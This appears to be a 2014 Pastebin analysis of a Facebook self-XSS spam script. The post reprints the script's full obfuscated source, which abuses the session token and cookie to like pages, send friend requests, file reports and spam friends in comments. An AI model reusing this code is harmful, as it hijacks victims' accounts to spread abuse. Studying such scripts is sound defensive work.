Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // I first saw this code on 2014-02-01 around midnight
- // this is the source code that was being posted in facebook that night,
- // it is a self cross site script attack, people where lead to copy-paste
- // this into their browser console.
- // in short: it spams your friends by linking them to comments on the page
- // it opens up a little window and plays some music while its at it.
- // I was able to deduce the behavior of the script, if you plan to read
- // you will need some knowledge of Javascript and AJAX to fully understand
- // how the script does it.
- // Though, it doesn't contain any exploits of any kind, so it's
- // not fault of facebook in any way. The users themselves are
- // to blame for the spamming.
- var parent = document.getElementsByTagName("html")[0];
- var _body = document.getElementsByTagName('body')[0];
- // Create a new div
- var _div = document.createElement('div');
- _div.style.height = "25";
- _div.style.width = "100%";
- _div.style.position = "fixed";
- _div.style.top = "auto";
- _div.style.bottom = "0";
- _div.align = "center";
- // Add new audio element
- var _audio = document.createElement('audio');
- _audio.style.width = "100%";
- _audio.style.height = "25px";
- _audio.controls = true;
- _audio.autoplay = false;
- _audio.autoplay = true;
- // Super Mario Ringtone.mp3 ?
- _audio.src = "http://picosong.com/YPGz";
- _div.appendChild(_audio);
- _body.appendChild(_div);
- // i suspect this is a token facebook uses to identify a user's request
- // it is used to hash requests in order to validate them (phstamp)
- var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
- // this is an object carrying the users unique facebook id
- // it is NOT only a string with the user id, to get solely the user_id a
- // document.cookie.match(/c_user=(\d+)/)[1]) would suffice.
- // note that the current session can be highjacked with access to the cookie
- var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- // the variables are unnecessarily redeclared
- var fb_dtsg = document.getElementsByName("fb_dtsg")[0].value;
- var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- // follow a facebook page
- // abone is the profile id to be followed
- function a(abone) {
- var http4 = new XMLHttpRequest;
- var url4 = "/ajax/follow/follow_profile.php?__a=1";
- var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
- http4.open("POST", url4, true);
- http4.onreadystatechange = function () {
- if (http4.readyState == 4 && http4.status == 200) http4.close
- };
- http4.send(params4)
- }
- // executes the previous function with an empty string as a parameter
- // therefore it dosen't follow anybody.
- // This function is not called anywhere else in the script
- a("");
- // subscribes to a set of facebook pages/users
- // uidss is a String array
- function sublist(uidss) {
- // create a new script element inside the scope of the page
- // seems unnecessary since we already have script access
- var a = document.createElement('script');
- // uidss is not serialized as expected in this expression
- a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
- // places script node in the body of the page
- document.body.appendChild(a)
- }
- // the user_id variable is re-declared once again (3rd time)
- var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
- // get the timestamp
- var now = (new Date).getTime();
- function P(post) {
- var X = new XMLHttpRequest();
- var XURL = "//www.facebook.com/ajax/ufi/like.php";
- var XParams = "like_action=true&ft_ent_identifier=" + post + "&source=1&client_id=" + now + "%3A3366677427&rootid=u_ps_0_0_14&giftoccasion&ft[tn]=%3E%3DU&ft[type]=20&ft[qid]=5882006890513784712&ft[mf_story_key]=" + post + "&nctr[_mod]=pagelet_home_stream&__user=" + user_id + "&__a=1&__dyn=7n8ahyj35CFwXAg&__req=j&fb_dtsg=" + fb_dtsg + "&phstamp=";
- X.open("POST", XURL, true);
- X.onreadystatechange = function () {
- if (X.readyState == 4 && X.status == 200) {
- X.close
- }
- };
- X.send(XParams)
- }
- // 4th time these variables are re-declared
- var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
- var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- // This code Likes a facebook page, don't know if it works,
- // it seems like its missing the phstamp hash, not confirmed
- // but phstamp might be only required for administrator requests
- function Like(p) {
- var Page = new XMLHttpRequest();
- var PageURL = "//www.facebook.com/ajax/pages/fan_status.php";
- var PageParams = "&fbpage_id=" + p + "&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg=" + fb_dtsg + "&phstamp=";
- Page.open("POST", PageURL, true);
- Page.onreadystatechange = function () {
- if (Page.readyState == 4 && Page.status == 200) {
- Page.close
- }
- };
- Page.send(PageParams)
- }
- Like("185309954944253");
- // This function creates a friend request
- function IDS(r) {
- var X = new XMLHttpRequest();
- var XURL = "//www.facebook.com/ajax/add_friend/action.php";
- var XParams = "to_friend=" + r + "&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user=" + user_id + "&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg=" + fb_dtsg + "&phstamp=";
- X.open("POST", XURL, true);
- X.onreadystatechange = function () {
- if (X.readyState == 4 && X.status == 200) {
- X.close
- }
- };
- X.send(XParams)
- }
- Like("1376249559308318");
- // From here on, the code is ofuscated. By evaluating pieces of code one is able
- // to get the source code. These are some of the strings used in the code: (giving a good idea what it does)
- //
- // var _0xb161 = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "getTime",
- // "//www.facebook.com/ajax/report/social.php", "fb_dtsg=",
- // "&block=1&pp=%7B%22actions_to_take%22%3A%22[]%22%2C%22are_friends%22%3Afalse%2C%22cid%22%3A",
- // "%2C%22content_type%22%3A0%2C%22expand_report%22%3A…ertt7%22%2C%22report_type%22%3A145%2C%22rid%22%3A",
- // "%2C%22sub_report_type%22%3A3%2C%22time_flow_started%22%3A", "%2C%22user%22%3A",
- // "%7D&file_report=1&__user=", "&__a=1&__dyn=7n8ahyj2qmvu5k9UmAAaUVpo&__req=u&ttstamp=2658168571071108880",
- // "POST", "open", "onreadystatechange", "readyState", "status", "close", "send", "100006952119048"];
- var _0xb161 = ["\x76\x61\x6C\x75\x65", "\x66\x62\x5F\x64\x74\x73\x67", "\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x4E\x61\x6D\x65", "\x6D\x61\x74\x63\x68", "\x63\x6F\x6F\x6B\x69\x65", "\x67\x65\x74\x54\x69\x6D\x65", "\x2F\x2F\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x2F\x61\x6A\x61\x78\x2F\x72\x65\x70\x6F\x72\x74\x2F\x73\x6F\x63\x69\x61\x6C\x2E\x70\x68\x70", "\x66\x62\x5F\x64\x74\x73\x67\x3D", "\x26\x62\x6C\x6F\x63\x6B\x3D\x31\x26\x70\x70\x3D\x25\x37\x42\x25\x32\x32\x61\x63\x74\x69\x6F\x6E\x73\x5F\x74\x6F\x5F\x74\x61\x6B\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x5B\x5D\x25\x32\x32\x25\x32\x43\x25\x32\x32\x61\x72\x65\x5F\x66\x72\x69\x65\x6E\x64\x73\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x63\x69\x64\x25\x32\x32\x25\x33\x41", "\x25\x32\x43\x25\x32\x32\x63\x6F\x6E\x74\x65\x6E\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x30\x25\x32\x43\x25\x32\x32\x65\x78\x70\x61\x6E\x64\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x33\x41\x31\x25\x32\x43\x25\x32\x32\x66\x69\x72\x73\x74\x5F\x63\x68\x6F\x69\x63\x65\x25\x32\x32\x25\x33\x41\x25\x32\x32\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x25\x32\x32\x25\x32\x43\x25\x32\x32\x66\x72\x6F\x6D\x5F\x67\x65\x61\x72\x25\x32\x32\x25\x33\x41\x25\x32\x32\x74\x69\x6D\x65\x6C\x69\x6E\x65\x25\x32\x32\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x66\x6F\x6C\x6C\x6F\x77\x69\x6E\x67\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x69\x73\x5F\x74\x61\x67\x67\x65\x64\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x6F\x6E\x5F\x70\x72\x6F\x66\x69\x6C\x65\x25\x32\x32\x25\x33\x41\x66\x61\x6C\x73\x65\x25\x32\x43\x25\x32\x32\x70\x68\x61\x73\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x72\x65\x66\x25\x32\x32\x25\x33\x41\x25\x32\x32\x68\x74\x74\x70\x73\x25\x33\x41\x25\x35\x43\x25\x32\x46\x25\x35\x43\x25\x32\x46\x77\x77\x77\x2E\x66\x61\x63\x65\x62\x6F\x6F\x6B\x2E\x63\x6F\x6D\x25\x35\x43\x25\x32\x46\x4E\x61\x6E\x2E\x65\x72\x74\x74\x37\x25\x32\x32\x25\x32\x43\x25\x32\x32\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x31\x34\x35\x25\x32\x43\x25\x32\x32\x72\x69\x64\x25\x32\x32\x25\x33\x41", "\x25\x32\x43\x25\x32\x32\x73\x75\x62\x5F\x72\x65\x70\x6F\x72\x74\x5F\x74\x79\x70\x65\x25\x32\x32\x25\x33\x41\x33\x25\x32\x43\x25\x32\x32\x74\x69\x6D\x65\x5F\x66\x6C\x6F\x77\x5F\x73\x74\x61\x72\x74\x65\x64\x25\x32\x32\x25\x33\x41", "\x25\x32\x43\x25\x32\x32\x75\x73\x65\x72\x25\x32\x32\x25\x33\x41", "\x25\x37\x44\x26\x66\x69\x6C\x65\x5F\x72\x65\x70\x6F\x72\x74\x3D\x31\x26\x5F\x5F\x75\x73\x65\x72\x3D", "\x26\x5F\x5F\x61\x3D\x31\x26\x5F\x5F\x64\x79\x6E\x3D\x37\x6E\x38\x61\x68\x79\x6A\x32\x71\x6D\x76\x75\x35\x6B\x39\x55\x6D\x41\x41\x61\x55\x56\x70\x6F\x26\x5F\x5F\x72\x65\x71\x3D\x75\x26\x74\x74\x73\x74\x61\x6D\x70\x3D\x32\x36\x35\x38\x31\x36\x38\x35\x37\x31\x30\x37\x31\x31\x30\x38\x38\x38\x30", "\x50\x4F\x53\x54", "\x6F\x70\x65\x6E", "\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65", "\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65", "\x73\x74\x61\x74\x75\x73", "\x63\x6C\x6F\x73\x65", "\x73\x65\x6E\x64", "\x31\x30\x30\x30\x30\x36\x39\x35\x32\x31\x31\x39\x30\x34\x38"];
- // THIS:
- var fb_dtsg = document[_0xb161[2]](_0xb161[1])[0][_0xb161[0]];
- var user_id = document[_0xb161[4]][_0xb161[3]](document[_0xb161[4]][_0xb161[3]](/c_user=(\d+)/)[1]);
- var now = (new Date)[_0xb161[5]]();
- // Is exactly the same as:
- // var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
- // var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
- // var now = (new Date).getTime();
- function Report(_0x45e7x5) {
- var _0x45e7x6 = new XMLHttpRequest();
- var _0x45e7x7 = _0xb161[6];
- var _0x45e7x8 = _0xb161[7] + fb_dtsg + _0xb161[8] + _0x45e7x5 + _0xb161[9] + _0x45e7x5 + _0xb161[10] + now + _0xb161[11] + user_id + _0xb161[12] + user_id + _0xb161[13];
- _0x45e7x6[_0xb161[15]](_0xb161[14], _0x45e7x7, true);
- _0x45e7x6[_0xb161[16]] = function () {
- if (_0x45e7x6[_0xb161[17]] == 4 && _0x45e7x6[_0xb161[18]] == 200) {
- _0x45e7x6[_0xb161[19]];
- };
- };
- _0x45e7x6[_0xb161[20]](_0x45e7x8);
- };
- // More strings that are later referenced.
- // In view that there are multiple string arrays, some parts of the code where ofuscated at
- // different times by different methods, it demostrates that the so called "hacker" has an unusually
- // high ability to copy-paste source code from the internet.
- var _0xa22c = ["value", "fb_dtsg", "getElementsByName", "match", "cookie", "1382559332008832",
- "onreadystatechange", "readyState", "arkadaslar = ", "for (;;);", "", "replace", "responseText",
- ";", "length", "entries", "payload", "round", " @[", "uid", ":", "text", "]", " ",
- "\x26filter[0]=user", "\x26options[0]=friends_only", "\x26options[1]=nm", "\x26token=v7",
- "\x26viewer=", "\x26__user=", "https://", "indexOf", "URL", "GET",
- "https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "open",
- "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1", "send", "random", "floor",
- "\x26ft_ent_identifier=", "\x26comment_text=", "\x26source=2", "\x26client_id=1377871797138:1707018092",
- "\x26reply_fbid", "\x26parent_comment_id", "\x26rootid=u_jsonp_2_3",
- "\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:", "}",
- "\x26attached_sticker_fbid=0", "\x26attached_photo_fbid=0", "\x26giftoccasion", "\x26ft[tn]=[]", "\x26__a=1",
- "\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo", "\x26__req=q", "\x26fb_dtsg=", "\x26ttstamp=", "POST",
- "/ajax/ufi/add_comment.php", "Content-type", "application/x-www-form-urlencoded", "setRequestHeader",
- "status", "close"];
- // Again this code is redeclared (6th time now)
- var fb_dtsg = document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];
- var user_id = document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);
- var id = _0xa22c[5];
- // Initializes an empty array
- var arkadaslar = [];
- // Initializes a variable (possibly a vestige of a Subversion)
- // note that this is not used anywhere
- var svn_rev;
- // From here on, it simply gets your friends ids and spams them by including them in comments.
- function arkadaslari_al(id) {
- var _0x7892x7 = new XMLHttpRequest();
- _0x7892x7[_0xa22c[6]] = function () {
- if (_0x7892x7[_0xa22c[7]] == 4) {
- eval(_0xa22c[8] + _0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9], _0xa22c[10]) + _0xa22c[13]);
- for (f = 0; f < Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]] / 27); f++) {
- mesaj = _0xa22c[10];
- mesaj_text = _0xa22c[10];
- for (i = f * 27; i < (f + 1) * 27; i++) {
- if (arkadaslar[_0xa22c[16]][_0xa22c[15]][i]) {
- mesaj += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]] + _0xa22c[22];
- mesaj_text += _0xa22c[23] + arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];
- };
- };
- yorum_yap(id, mesaj);
- };
- };
- };
- var _0x7892x8 = _0xa22c[24];
- _0x7892x8 += _0xa22c[25];
- _0x7892x8 += _0xa22c[26];
- _0x7892x8 += _0xa22c[27];
- _0x7892x8 += _0xa22c[28] + user_id;
- _0x7892x8 += _0xa22c[29] + user_id;
- if (document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30]) >= 0) {
- _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[34] + _0x7892x8, true);
- } else {
- _0x7892x7[_0xa22c[35]](_0xa22c[33], _0xa22c[36] + _0x7892x8, true);
- };
- _0x7892x7[_0xa22c[37]]();
- };
- function RandomArkadas() {
- var _0x7892xa = _0xa22c[10];
- for (i = 0; i < 9; i++) {
- _0x7892xa += _0xa22c[18] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]] + _0xa22c[20] + arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]() * arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]] + _0xa22c[22];
- };
- return _0x7892xa;
- };
- function yorum_yap(id, _0x7892xc) {
- var _0x7892xd = new XMLHttpRequest();
- var _0x7892x8 = _0xa22c[10];
- _0x7892x8 += _0xa22c[40] + id;
- _0x7892x8 += _0xa22c[41] + encodeURIComponent(_0x7892xc);
- _0x7892x8 += _0xa22c[42];
- _0x7892x8 += _0xa22c[43];
- _0x7892x8 += _0xa22c[44];
- _0x7892x8 += _0xa22c[45];
- _0x7892x8 += _0xa22c[46];
- _0x7892x8 += _0xa22c[47] + id + _0xa22c[48];
- _0x7892x8 += _0xa22c[49];
- _0x7892x8 += _0xa22c[50];
- _0x7892x8 += _0xa22c[51];
- _0x7892x8 += _0xa22c[52];
- _0x7892x8 += _0xa22c[29] + user_id;
- _0x7892x8 += _0xa22c[53];
- _0x7892x8 += _0xa22c[54];
- _0x7892x8 += _0xa22c[55];
- _0x7892x8 += _0xa22c[56] + fb_dtsg;
- _0x7892x8 += _0xa22c[57];
- _0x7892xd[_0xa22c[35]](_0xa22c[58], _0xa22c[59], true);
- _0x7892xd[_0xa22c[62]](_0xa22c[60], _0xa22c[61]);
- _0x7892xd[_0xa22c[6]] = function () {
- if (_0x7892xd[_0xa22c[7]] == 4 && _0x7892xd[_0xa22c[63]] == 200) {
- _0x7892xd[_0xa22c[64]];
- };
- };
- _0x7892xd[_0xa22c[37]](_0x7892x8);
- };
- arkadaslari_al(id);
- /* Conclusion:
- * This script was clearly done by a script kiddie, there are tons of copy-pasted code and obvious
- * errors within making portions of the script unusable and redundant.
- *
- * Its amazing people actually paste this code into their browser, even when they are educated not
- * to do so.
- *
- * I guess these are the same people that get told not to eat glue at school.
- *
- * By: El Ninja
- * 2014-02-03
- */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement